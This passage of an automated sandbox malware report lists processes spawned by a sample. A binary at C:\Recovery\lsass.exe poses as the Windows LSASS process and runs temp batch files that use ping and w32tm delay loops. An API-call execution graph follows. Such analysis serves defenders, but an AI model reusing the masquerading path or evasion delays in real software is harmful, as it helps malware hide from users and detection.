                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff65a030000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:19:43:29
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x2d0000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:19:43:32
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:19:43:32
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:19:43:32
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:19:43:33
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff65a030000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:19:43:38
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x480000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:19:43:41
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:19:43:41
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:19:43:41
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:19:43:41
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff636520000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:19:43:50
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0xf20000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:19:43:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:60
                                      Start time:19:43:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:61
                                      Start time:19:43:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:19:43:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff636520000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:9.3%
                                        Total number of Nodes:1508
                                        Total number of Limit Nodes:27
                                        execution_graph 25417 bc1bbd GetCPInfo IsDBCSLeadByte 25376 bcb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23403 bce5b1 23404 bce578 23403->23404 23404->23403 23406 bce85d 23404->23406 23432 bce5bb 23406->23432 23408 bce86d 23409 bce8ee 23408->23409 23410 bce8ca 23408->23410 23413 bce966 LoadLibraryExA 23409->23413 23415 bce9c7 23409->23415 23416 bce9d9 23409->23416 23420 bcea95 23409->23420 23411 bce7fb DloadReleaseSectionWriteAccess 6 API calls 23410->23411 23412 bce8d5 RaiseException 23411->23412 23427 bceac3 23412->23427 23414 bce979 GetLastError 23413->23414 23413->23415 23418 bce9a2 23414->23418 23426 bce98c 23414->23426 23415->23416 23417 bce9d2 FreeLibrary 23415->23417 23419 bcea37 GetProcAddress 23416->23419 23416->23420 23417->23416 23422 bce7fb DloadReleaseSectionWriteAccess 6 API calls 23418->23422 23419->23420 23421 bcea47 GetLastError 23419->23421 23441 bce7fb 23420->23441 23424 bcea5a 23421->23424 23423 bce9ad RaiseException 23422->23423 23423->23427 23424->23420 23428 bce7fb DloadReleaseSectionWriteAccess 6 API calls 23424->23428 23426->23415 23426->23418 23427->23404 23429 bcea7b RaiseException 23428->23429 23430 bce5bb ___delayLoadHelper2@8 6 API calls 23429->23430 23431 bcea92 23430->23431 23431->23420 23433 bce5ed 23432->23433 23434 bce5c7 23432->23434 23433->23408 23449 bce664 23434->23449 23436 bce5cc 23437 bce5e8 23436->23437 23452 bce78d 23436->23452 23457 bce5ee GetModuleHandleW GetProcAddress GetProcAddress 23437->23457 23440 bce836 23440->23408 23442 bce80d 23441->23442 23443 bce82f 23441->23443 23444 bce664 DloadReleaseSectionWriteAccess 3 API calls 23442->23444 23443->23427 23445 bce812 23444->23445 23446 bce82a 23445->23446 23448 bce78d DloadProtectSection 3 API calls 23445->23448 23460 bce831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23446->23460 23448->23446 23458 bce5ee GetModuleHandleW GetProcAddress GetProcAddress 23449->23458 23451 bce669 23451->23436 23454 bce7a2 DloadProtectSection 23452->23454 23453 bce7a8 23453->23437 23454->23453 23455 bce7dd VirtualProtect 23454->23455 23459 bce6a3 VirtualQuery GetSystemInfo 23454->23459 23455->23453 23457->23440 23458->23451 23459->23455 23460->23443 23669 bcf3b2 23670 bcf3be ___scrt_is_nonwritable_in_current_image 23669->23670 23701 bceed7 23670->23701 23672 bcf3c5 23673 bcf518 23672->23673 23676 bcf3ef 23672->23676 23774 bcf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23673->23774 23675 bcf51f 23767 bd7f58 23675->23767 23689 bcf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23676->23689 23712 bd8aed 23676->23712 23683 bcf40e 23685 bcf48f 23720 bcf953 GetStartupInfoW _abort 23685->23720 23687 bcf495 23721 bd8a3e 51 API calls 23687->23721 23689->23685 23770 bd7af4 38 API calls _abort 23689->23770 23690 bcf49d 23722 bcdf1e 23690->23722 23695 bcf4b1 23695->23675 23696 bcf4b5 23695->23696 23697 bcf4be 23696->23697 23772 bd7efb 28 API calls _abort 23696->23772 23773 bcf048 12 API calls ___scrt_uninitialize_crt 23697->23773 23700 bcf4c6 23700->23683 23702 bceee0 23701->23702 23776 bcf654 IsProcessorFeaturePresent 23702->23776 23704 bceeec 23777 bd2a5e 23704->23777 23706 bceef1 23707 bceef5 23706->23707 23785 bd8977 23706->23785 23707->23672 23710 bcef0c 23710->23672 23713 bd8b04 23712->23713 23714 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23713->23714 23715 bcf408 23714->23715 23715->23683 23716 bd8a91 23715->23716 23719 bd8ac0 23716->23719 23717 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23718 bd8ae9 23717->23718 23718->23689 23719->23717 23720->23687 23721->23690 23885 bc0863 23722->23885 23726 bcdf3d 23934 bcac16 23726->23934 23728 bcdf46 _abort 23729 bcdf59 GetCommandLineW 23728->23729 23730 bcdf68 23729->23730 23731 bcdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23729->23731 23971 bcc5c4 83 API calls 23730->23971 23938 bb4092 23731->23938 23735 bcdf6e 23737 bcdf76 OpenFileMappingW 23735->23737 23738 bcdfe0 23735->23738 23741 bcdf8f MapViewOfFile 23737->23741 23742 bcdfd6 CloseHandle 23737->23742 23973 bcdbde SetEnvironmentVariableW SetEnvironmentVariableW 23738->23973 23744 bcdfcd UnmapViewOfFile 23741->23744 23745 bcdfa0 __InternalCxxFrameHandler 23741->23745 23742->23731 23744->23742 23972 bcdbde SetEnvironmentVariableW SetEnvironmentVariableW 23745->23972 23750 bcdfbc 23750->23744 23751 bc90b7 8 API calls 23752 bce0aa DialogBoxParamW 23751->23752 23753 bce0e4 23752->23753 23754 bce0fd 23753->23754 23755 bce0f6 Sleep 23753->23755 23757 bce10b 23754->23757 23974 bcae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23754->23974 23755->23754 23758 bce12a DeleteObject 23757->23758 23759 bce13f DeleteObject 23758->23759 23760 bce146 23758->23760 23759->23760 23761 bce189 23760->23761 23762 bce177 23760->23762 23968 bcac7c 23761->23968 23975 bcdc3b 6 API calls 23762->23975 23765 bce17d CloseHandle 23765->23761 23766 bce1c3 23771 bcf993 GetModuleHandleW 23766->23771 24225 bd7cd5 23767->24225 23770->23685 23771->23695 23772->23697 23773->23700 23774->23675 23776->23704 23789 bd3b07 23777->23789 23781 bd2a7a 23781->23706 23782 bd2a6f 23782->23781 23803 bd3b43 DeleteCriticalSection 23782->23803 23784 bd2a67 23784->23706 23832 bdc05a 23785->23832 23788 bd2a7d 7 API calls 2 library calls 23788->23707 23790 bd3b10 23789->23790 23792 bd3b39 23790->23792 23793 bd2a63 23790->23793 23804 bd3d46 23790->23804 23809 bd3b43 DeleteCriticalSection 23792->23809 23793->23784 23795 bd2b8c 23793->23795 23825 bd3c57 23795->23825 23798 bd2ba1 23798->23782 23800 bd2baf 23801 bd2bbc 23800->23801 23831 bd2bbf 6 API calls ___vcrt_FlsFree 23800->23831 23801->23782 23803->23784 23810 bd3c0d 23804->23810 23807 bd3d7e InitializeCriticalSectionAndSpinCount 23808 bd3d69 23807->23808 23808->23790 23809->23793 23811 bd3c26 23810->23811 23812 bd3c4f 23810->23812 23811->23812 23817 bd3b72 23811->23817 23812->23807 23812->23808 23815 bd3c3b GetProcAddress 23815->23812 23816 bd3c49 23815->23816 23816->23812 23822 bd3b7e ___vcrt_FlsFree 23817->23822 23818 bd3b95 LoadLibraryExW 23819 bd3bfa 23818->23819 23820 bd3bb3 GetLastError 23818->23820 23821 bd3bf3 23819->23821 23823 bd3c02 FreeLibrary 23819->23823 23820->23822 23821->23812 23821->23815 23822->23818 23822->23821 23824 bd3bd5 LoadLibraryExW 23822->23824 23823->23821 23824->23819 23824->23822 23826 bd3c0d ___vcrt_FlsFree 5 API calls 23825->23826 23827 bd3c71 23826->23827 23828 bd3c8a TlsAlloc 23827->23828 23829 bd2b96 23827->23829 23829->23798 23830 bd3d08 6 API calls ___vcrt_FlsFree 23829->23830 23830->23800 23831->23798 23833 bdc077 23832->23833 23836 bdc073 23832->23836 23833->23836 23838 bda6a0 23833->23838 23834 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23835 bceefe 23834->23835 23835->23710 23835->23788 23836->23834 23839 bda6ac ___scrt_is_nonwritable_in_current_image 23838->23839 23850 bdac31 EnterCriticalSection 23839->23850 23841 bda6b3 23851 bdc528 23841->23851 23843 bda6c2 23844 bda6d1 23843->23844 23864 bda529 29 API calls 23843->23864 23866 bda6ed LeaveCriticalSection _abort 23844->23866 23847 bda6cc 23865 bda5df GetStdHandle GetFileType 23847->23865 23848 bda6e2 _abort 23848->23833 23850->23841 23852 bdc534 ___scrt_is_nonwritable_in_current_image 23851->23852 23853 bdc558 23852->23853 23854 bdc541 23852->23854 23867 bdac31 EnterCriticalSection 23853->23867 23875 bd91a8 20 API calls _abort 23854->23875 23857 bdc546 23876 bd9087 26 API calls __cftof 23857->23876 23859 bdc590 23877 bdc5b7 LeaveCriticalSection _abort 23859->23877 23860 bdc550 _abort 23860->23843 23861 bdc564 23861->23859 23868 bdc479 23861->23868 23864->23847 23865->23844 23866->23848 23867->23861 23869 bdb136 _abort 20 API calls 23868->23869 23870 bdc48b 23869->23870 23874 bdc498 23870->23874 23878 bdaf0a 23870->23878 23871 bd8dcc _free 20 API calls 23872 bdc4ea 23871->23872 23872->23861 23874->23871 23875->23857 23876->23860 23877->23860 23879 bdac98 _abort 5 API calls 23878->23879 23880 bdaf31 23879->23880 23881 bdaf4f InitializeCriticalSectionAndSpinCount 23880->23881 23882 bdaf3a 23880->23882 23881->23882 23883 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23882->23883 23884 bdaf66 23883->23884 23884->23870 23976 bcec50 23885->23976 23888 bc0888 GetProcAddress 23891 bc08b9 GetProcAddress 23888->23891 23892 bc08a1 23888->23892 23889 bc08e7 23890 bc0c14 GetModuleFileNameW 23889->23890 23987 bd75fb 42 API calls __vsnwprintf_l 23889->23987 23901 bc0c32 23890->23901 23894 bc08cb 23891->23894 23892->23891 23894->23889 23895 bc0b54 23895->23890 23896 bc0b5f GetModuleFileNameW CreateFileW 23895->23896 23897 bc0b8f SetFilePointer 23896->23897 23898 bc0c08 CloseHandle 23896->23898 23897->23898 23899 bc0b9d ReadFile 23897->23899 23898->23890 23899->23898 23903 bc0bbb 23899->23903 23904 bc0c94 GetFileAttributesW 23901->23904 23906 bc0c5d CompareStringW 23901->23906 23907 bc0cac 23901->23907 23978 bbb146 23901->23978 23981 bc081b 23901->23981 23903->23898 23905 bc081b 2 API calls 23903->23905 23904->23901 23904->23907 23905->23903 23906->23901 23908 bc0cb7 23907->23908 23911 bc0cec 23907->23911 23910 bc0cd0 GetFileAttributesW 23908->23910 23912 bc0ce8 23908->23912 23909 bc0dfb 23933 bca64d GetCurrentDirectoryW 23909->23933 23910->23908 23910->23912 23911->23909 23913 bbb146 GetVersionExW 23911->23913 23912->23911 23914 bc0d06 23913->23914 23915 bc0d0d 23914->23915 23916 bc0d73 23914->23916 23917 bc081b 2 API calls 23915->23917 23918 bb4092 _swprintf 51 API calls 23916->23918 23919 bc0d17 23917->23919 23920 bc0d9b AllocConsole 23918->23920 23923 bc081b 2 API calls 23919->23923 23921 bc0da8 GetCurrentProcessId AttachConsole 23920->23921 23922 bc0df3 ExitProcess 23920->23922 23992 bd3e13 23921->23992 23925 bc0d21 23923->23925 23988 bbe617 23925->23988 23926 bc0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23926->23922 23929 bb4092 _swprintf 51 API calls 23930 bc0d4f 23929->23930 23931 bbe617 53 API calls 23930->23931 23932 bc0d5e 23931->23932 23932->23922 23933->23726 23935 bc081b 2 API calls 23934->23935 23936 bcac2a OleInitialize 23935->23936 23937 bcac4d GdiplusStartup SHGetMalloc 23936->23937 23937->23728 24017 bb4065 23938->24017 23941 bcb6dd LoadBitmapW 23942 bcb6fe 23941->23942 23943 bcb70b GetObjectW 23941->23943 24051 bca6c2 FindResourceW 23942->24051 23947 bcb71a 23943->23947 24046 bca5c6 23947->24046 23949 bcb770 23960 bbda42 23949->23960 23950 bcb74c 24067 bca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23950->24067 23951 bca6c2 13 API calls 23953 bcb73d 23951->23953 23953->23950 23955 bcb743 DeleteObject 23953->23955 23954 bcb754 24068 bca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23954->24068 23955->23950 23957 bcb75d 24069 bca80c 8 API calls 23957->24069 23959 bcb764 DeleteObject 23959->23949 24080 bbda67 23960->24080 23965 bc90b7 24213 bceb38 23965->24213 23969 bcacab GdiplusShutdown CoUninitialize 23968->23969 23969->23766 23971->23735 23972->23750 23973->23731 23974->23757 23975->23765 23977 bc086d GetModuleHandleW 23976->23977 23977->23888 23977->23889 23979 bbb15a GetVersionExW 23978->23979 23980 bbb196 23978->23980 23979->23980 23980->23901 23982 bcec50 23981->23982 23983 bc0828 GetSystemDirectoryW 23982->23983 23984 bc085e 23983->23984 23985 bc0840 23983->23985 23984->23901 23986 bc0851 LoadLibraryW 23985->23986 23986->23984 23987->23895 23989 bbe627 23988->23989 23994 bbe648 23989->23994 23993 bd3e1b 23992->23993 23993->23926 23993->23993 24000 bbd9b0 23994->24000 23997 bbe66b LoadStringW 23998 bbe645 23997->23998 23999 bbe682 LoadStringW 23997->23999 23998->23929 23999->23998 24005 bbd8ec 24000->24005 24002 bbd9cd 24004 bbd9e2 24002->24004 24013 bbd9f0 26 API calls 24002->24013 24004->23997 24004->23998 24006 bbd904 24005->24006 24012 bbd984 _strncpy 24005->24012 24008 bbd928 24006->24008 24014 bc1da7 WideCharToMultiByte 24006->24014 24011 bbd959 24008->24011 24015 bbe5b1 50 API calls __vsnprintf 24008->24015 24016 bd6159 26 API calls 3 library calls 24011->24016 24012->24002 24013->24004 24014->24008 24015->24011 24016->24012 24018 bb407c __vsnwprintf_l 24017->24018 24021 bd5fd4 24018->24021 24024 bd4097 24021->24024 24025 bd40bf 24024->24025 24026 bd40d7 24024->24026 24041 bd91a8 20 API calls _abort 24025->24041 24026->24025 24027 bd40df 24026->24027 24029 bd4636 __cftof 38 API calls 24027->24029 24032 bd40ef 24029->24032 24030 bd40c4 24042 bd9087 26 API calls __cftof 24030->24042 24043 bd4601 20 API calls 2 library calls 24032->24043 24034 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24036 bb4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24034->24036 24035 bd4167 24044 bd49e6 51 API calls 3 library calls 24035->24044 24036->23941 24039 bd4172 24045 bd46b9 20 API calls _free 24039->24045 24040 bd40cf 24040->24034 24041->24030 24042->24040 24043->24035 24044->24039 24045->24040 24070 bca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24046->24070 24048 bca5cd 24050 bca5d9 24048->24050 24071 bca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24048->24071 24050->23949 24050->23950 24050->23951 24052 bca6e5 SizeofResource 24051->24052 24057 bca7d3 24051->24057 24053 bca6fc LoadResource 24052->24053 24052->24057 24054 bca711 LockResource 24053->24054 24053->24057 24055 bca722 GlobalAlloc 24054->24055 24054->24057 24056 bca73d GlobalLock 24055->24056 24055->24057 24058 bca7cc GlobalFree 24056->24058 24059 bca74c __InternalCxxFrameHandler 24056->24059 24057->23943 24057->23947 24058->24057 24060 bca754 CreateStreamOnHGlobal 24059->24060 24061 bca76c 24060->24061 24062 bca7c5 GlobalUnlock 24060->24062 24072 bca626 GdipAlloc 24061->24072 24062->24058 24065 bca79a GdipCreateHBITMAPFromBitmap 24066 bca7b0 24065->24066 24066->24062 24067->23954 24068->23957 24069->23959 24070->24048 24071->24050 24073 bca638 24072->24073 24074 bca645 24072->24074 24076 bca3b9 24073->24076 24074->24062 24074->24065 24074->24066 24077 bca3da GdipCreateBitmapFromStreamICM 24076->24077 24078 bca3e1 GdipCreateBitmapFromStream 24076->24078 24079 bca3e6 24077->24079 24078->24079 24079->24074 24081 bbda75 __EH_prolog 24080->24081 24082 bbdaa4 GetModuleFileNameW 24081->24082 24083 bbdad5 24081->24083 24084 bbdabe 24082->24084 24126 bb98e0 24083->24126 24084->24083 24086 bbdb31 24137 bd6310 24086->24137 24088 bbe261 78 API calls 24091 bbdb05 24088->24091 24091->24086 24091->24088 24117 bbdd4a 24091->24117 24092 bbdb44 24093 bd6310 26 API calls 24092->24093 24099 bbdb56 ___vcrt_FlsFree 24093->24099 24094 bbdc85 24094->24117 24173 bb9d70 81 API calls 24094->24173 24098 bbdc9f ___std_exception_copy 24100 bb9bd0 82 API calls 24098->24100 24098->24117 24099->24094 24099->24117 24151 bb9e80 24099->24151 24167 bb9bd0 24099->24167 24172 bb9d70 81 API calls 24099->24172 24101 bbdcc8 ___std_exception_copy 24100->24101 24101->24117 24122 bbdcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24101->24122 24174 bc1b84 MultiByteToWideChar 24101->24174 24104 bbe159 24110 bbe1de 24104->24110 24180 bd8cce 26 API calls 2 library calls 24104->24180 24107 bbe16e 24181 bd7625 26 API calls 2 library calls 24107->24181 24109 bbe1c6 24182 bbe27c 78 API calls 24109->24182 24111 bbe214 24110->24111 24113 bbe261 78 API calls 24110->24113 24114 bd6310 26 API calls 24111->24114 24113->24110 24115 bbe22d 24114->24115 24116 bd6310 26 API calls 24115->24116 24116->24117 24160 bb959a 24117->24160 24120 bc1da7 WideCharToMultiByte 24120->24122 24122->24104 24122->24117 24122->24120 24175 bbe5b1 50 API calls __vsnprintf 24122->24175 24176 bd6159 26 API calls 3 library calls 24122->24176 24177 bd8cce 26 API calls 2 library calls 24122->24177 24178 bd7625 26 API calls 2 library calls 24122->24178 24179 bbe27c 78 API calls 24122->24179 24124 bbe29e GetModuleHandleW FindResourceW 24125 bbda55 24124->24125 24125->23965 24127 bb98ea 24126->24127 24128 bb994b CreateFileW 24127->24128 24129 bb996c GetLastError 24128->24129 24133 bb99bb 24128->24133 24183 bbbb03 24129->24183 24131 bb998c 24132 bb9990 CreateFileW GetLastError 24131->24132 24131->24133 24132->24133 24135 bb99b5 24132->24135 24134 bb99ff 24133->24134 24136 bb99e5 SetFileTime 24133->24136 24134->24091 24135->24133 24136->24134 24138 bd6349 24137->24138 24139 bd634d 24138->24139 24150 bd6375 24138->24150 24187 bd91a8 20 API calls _abort 24139->24187 24141 bd6352 24188 bd9087 26 API calls __cftof 24141->24188 24142 bd6699 24144 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24142->24144 24146 bd66a6 24144->24146 24145 bd635d 24147 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24145->24147 24146->24092 24148 bd6369 24147->24148 24148->24092 24150->24142 24189 bd6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24150->24189 24152 bb9e92 24151->24152 24153 bb9ea5 24151->24153 24156 bb9eb0 24152->24156 24190 bb6d5b 77 API calls 24152->24190 24155 bb9eb8 SetFilePointer 24153->24155 24153->24156 24155->24156 24157 bb9ed4 GetLastError 24155->24157 24156->24099 24157->24156 24158 bb9ede 24157->24158 24158->24156 24191 bb6d5b 77 API calls 24158->24191 24161 bb95be 24160->24161 24166 bb95cf 24160->24166 24162 bb95ca 24161->24162 24163 bb95d1 24161->24163 24161->24166 24192 bb974e 24162->24192 24197 bb9620 24163->24197 24166->24124 24169 bb9bdc 24167->24169 24171 bb9be3 24167->24171 24168 bb9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24168->24171 24169->24099 24171->24168 24171->24169 24212 bb6d1a 77 API calls 24171->24212 24172->24099 24173->24098 24174->24122 24175->24122 24176->24122 24177->24122 24178->24122 24179->24122 24180->24107 24181->24109 24182->24110 24184 bbbb10 _wcslen 24183->24184 24185 bbbbb8 GetCurrentDirectoryW 24184->24185 24186 bbbb39 _wcslen 24184->24186 24185->24186 24186->24131 24187->24141 24188->24145 24189->24150 24190->24153 24191->24156 24193 bb9781 24192->24193 24194 bb9757 24192->24194 24193->24166 24194->24193 24203 bba1e0 24194->24203 24198 bb962c 24197->24198 24200 bb964a 24197->24200 24198->24200 24201 bb9638 CloseHandle 24198->24201 24199 bb9669 24199->24166 24200->24199 24211 bb6bd5 76 API calls 24200->24211 24201->24200 24204 bcec50 24203->24204 24205 bba1ed DeleteFileW 24204->24205 24206 bb977f 24205->24206 24207 bba200 24205->24207 24206->24166 24208 bbbb03 GetCurrentDirectoryW 24207->24208 24209 bba214 24208->24209 24209->24206 24210 bba218 DeleteFileW 24209->24210 24210->24206 24211->24199 24212->24171 24214 bceb3d ___std_exception_copy 24213->24214 24215 bc90d6 24214->24215 24218 bceb59 24214->24218 24222 bd7a5e 7 API calls 2 library calls 24214->24222 24215->23751 24217 bcf5c9 24224 bd238d RaiseException 24217->24224 24218->24217 24223 bd238d RaiseException 24218->24223 24221 bcf5e6 24222->24214 24223->24217 24224->24221 24226 bd7ce1 _abort 24225->24226 24227 bd7ce8 24226->24227 24228 bd7cfa 24226->24228 24261 bd7e2f GetModuleHandleW 24227->24261 24249 bdac31 EnterCriticalSection 24228->24249 24231 bd7ced 24231->24228 24262 bd7e73 GetModuleHandleExW 24231->24262 24232 bd7d9f 24250 bd7ddf 24232->24250 24236 bd7d76 24241 bd7d8e 24236->24241 24246 bd8a91 _abort 5 API calls 24236->24246 24238 bd7d01 24238->24232 24238->24236 24270 bd87e0 20 API calls _abort 24238->24270 24239 bd7dbc 24253 bd7dee 24239->24253 24240 bd7de8 24271 be2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24240->24271 24242 bd8a91 _abort 5 API calls 24241->24242 24242->24232 24246->24241 24249->24238 24272 bdac81 LeaveCriticalSection 24250->24272 24252 bd7db8 24252->24239 24252->24240 24273 bdb076 24253->24273 24256 bd7e1c 24259 bd7e73 _abort 8 API calls 24256->24259 24257 bd7dfc GetPEB 24257->24256 24258 bd7e0c GetCurrentProcess TerminateProcess 24257->24258 24258->24256 24260 bd7e24 ExitProcess 24259->24260 24261->24231 24263 bd7e9d GetProcAddress 24262->24263 24264 bd7ec0 24262->24264 24265 bd7eb2 24263->24265 24266 bd7ecf 24264->24266 24267 bd7ec6 FreeLibrary 24264->24267 24265->24264 24268 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24266->24268 24267->24266 24269 bd7cf9 24268->24269 24269->24228 24270->24236 24272->24252 24274 bdb09b 24273->24274 24278 bdb091 24273->24278 24275 bdac98 _abort 5 API calls 24274->24275 24275->24278 24276 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24277 bd7df8 24276->24277 24277->24256 24277->24257 24278->24276 25419 bb6faa 111 API calls 3 library calls 25379 bceda7 48 API calls _unexpected 25420 bcf3a0 27 API calls 25343 bda4a0 71 API 